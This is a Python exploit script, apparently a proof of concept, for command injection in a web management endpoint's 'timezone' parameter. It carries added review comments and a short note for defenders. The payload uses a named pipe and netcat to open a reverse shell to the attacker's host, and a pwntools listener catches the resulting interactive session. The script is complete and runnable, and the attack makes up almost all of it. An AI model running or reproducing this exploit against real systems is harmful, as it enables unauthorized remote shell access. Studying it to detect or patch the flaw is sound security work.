#!/usr/bin/python3
import requests
import argparse
import json
from pwn import *

def exploit(target: str, localhost: str, localport: str) -> None:
    """Send a single POST to the target's ``set_timezone`` management endpoint.

    Args:
        target: Base URL of the target; used verbatim to build the request
            URL and the ``Origin``/``Referer`` headers.
        localhost: Address interpolated into the ``timezone`` form field.
        localport: Port interpolated into the ``timezone`` form field.

    Returns:
        None. The HTTP response is never inspected, and every exception
        raised by ``requests.post`` (connection errors, the 3-second
        timeout) is silently swallowed, so the caller gets no feedback.
    """
    url = f'{target}/index.php/management/set_timezone'

    # Headers imitate an XHR issued from the management "datetime" page
    # (X-Requested-With, Origin and Referer all point at the target).
    headers = {
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'Origin': f'{target}',
        'Referer': f'{target}/index.php/management/datetime',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }

    # The ``timezone`` field carries a backtick-quoted shell command instead
    # of a timezone name: this parameter is the injection point. From a
    # defender's view, a ``timezone`` value containing shell metacharacters
    # (backticks, ';', '|', '<', '>') is the indicator to alert on, and the
    # server-side fix is to validate the value against a list of known
    # timezone names rather than passing it to a shell.
    data = {
        'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc {localhost} {localport} 1>/tmp/pipe`'
    }

    # Bare except: any failure, including the expected timeout (the injected
    # command presumably blocks the request handler), is ignored.
    try:
        response = requests.post(url, headers=headers, data=data, timeout=3)
    except:
        pass

def get_external_ip():
    """Return this host's public IP address as reported by ipinfo.io.

    Returns:
        The ``ip`` field of the JSON document served at
        ``https://ipinfo.io/json`` when the response status is 200.
        On any other status the function returns a 3-tuple of strings
        (see the NOTE below) rather than an address.

    Raises:
        requests.RequestException: propagated from ``requests.get``; no
            ``timeout`` is set, so a hanging connection blocks indefinitely.
        ValueError (or a subclass): if the response body is not JSON.
        KeyError: if the JSON document has no ``ip`` key.
    """
    endpoint = 'https://ipinfo.io/json'
    # verify=True is the requests default (TLS certificate validation on);
    # it is spelled out here explicitly.
    response = requests.get(endpoint, verify = True)

    if response.status_code != 200:
        # NOTE(review): this returns a tuple instead of raising, so a caller
        # that expects a string receives ('Status:', <code>, '...') and the
        # exit() on the next line is unreachable. Raising an exception here
        # would let the caller's existing exception handling deal with it.
        return 'Status:', response.status_code, 'Problem with the request. Exiting.'
        exit()

    data = response.json()

    return data['ip']

if __name__ == "__main__":

    ## parse argument
    # -t is required (so the ``default=False`` on it can never take effect);
    # -l defaults to False, which the check below uses as "not supplied";
    # -p is kept as the string "443" (argparse performs no int conversion).
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", action="store", help="Target url, http://localhost:9000", default=False, required=True)
    parser.add_argument("-l", "--localhost", action="store", help="Local IP address for reverse shell", default=False)
    parser.add_argument("-p", "--localport", action="store", help="Local port for reverse shell", default="443")
    args = parser.parse_args()
    
    if args.target is not False:

        if args.localhost is False:

            # get external ip address for listener
            # NOTE(review): ``sys`` is not imported in this file; presumably it
            # arrives via ``from pwn import *`` — confirm, otherwise this
            # branch raises NameError instead of exiting cleanly.
            try:
                args.localhost = get_external_ip()
            except:
                print("Not able to get external IP address")
                sys.exit(1)

        # running listener
        # ``listen`` comes from the pwn star-import; the port is the raw
        # string from argparse.
        l = listen(args.localport)

        # sending exploit payload
        exploit(args.target,args.localhost,args.localport)
        
        # waiting for a reverse connection
        # Bare except also catches KeyboardInterrupt (it is a BaseException),
        # so Ctrl-C during the wait or the session ends silently; the
        # listener is always closed by the finally clause.
        try:
            s = l.wait_for_connection()
            s.interactive()
        except:
            pass
        finally:
            l.close()

    else:
        # Unreachable in practice: argparse already rejects a missing -t
        # because the option is ``required=True``.
        parser.print_help()
        parser.exit()